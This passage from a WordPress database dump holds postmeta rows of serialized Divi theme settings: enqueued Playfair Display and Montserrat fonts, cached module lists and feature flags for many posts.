led\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33639,1658,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33640,516,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33641,516,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33642,516,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33635,1661,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33636,1658,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33637,1658,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33638,1658,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33631,1662,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33632,1661,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33633,1661,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33634,1661,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33627,1663,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33628,1662,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33629,1662,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33630,1662,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33623,1665,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33624,1663,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33625,1663,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33626,1663,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33619,1666,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33620,1665,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33621,1665,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33622,1665,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33615,1315,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33616,1666,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33617,1666,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33618,1666,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33608,25,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33609,25,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33610,1325,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33611,1325,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33612,1315,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33613,1315,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33614,1315,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33604,864,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33605,864,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33606,864,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33607,864,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33600,891,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33601,891,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33602,891,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33603,891,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33596,884,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33597,884,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33598,884,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33599,884,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33592,558,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33593,558,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33594,558,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33595,558,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33589,1525,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33590,1525,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33591,1525,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33575,747,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33576,747,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33577,747,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i: